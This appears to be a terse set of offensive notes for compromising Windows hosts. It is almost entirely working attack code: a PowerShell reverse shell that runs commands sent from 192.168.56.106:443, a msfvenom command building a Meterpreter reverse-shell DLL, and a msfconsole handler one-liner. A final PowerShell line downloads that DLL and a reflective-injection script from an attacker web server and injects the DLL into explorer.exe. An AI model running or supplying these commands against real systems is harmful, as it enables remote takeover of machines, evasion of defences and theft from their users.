$client = New-Object System.Net.Sockets.TCPClient('192.168.56.106',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String);$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte =
([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.x.x LPORT=443 EXITFUNC=thread -f dll > shell.dll
sudo msfconsole -x "use exploit/multi/handler;set payload windows/x64/meterpreter/reverse_tcp;set LHOST 192.168.x.y;set LPORT 443;run;"
don't forget to set your shell.dll and Invoke-ReflectionPEInjection.ps1 in http server.
$apple = (New-Object System.Net.webClient).DownloadData('http://192.168.x.y/shell.dll'); $procid = (Get-Process -name explorer).Id;IEX (New-Object Net.WebClient).DownloadString('http://192.168.x.x/Invoke-ReflectivePEInjection.ps1');Invoke-ReflectivePEInjection -PEBytes $apple -ProcId $procid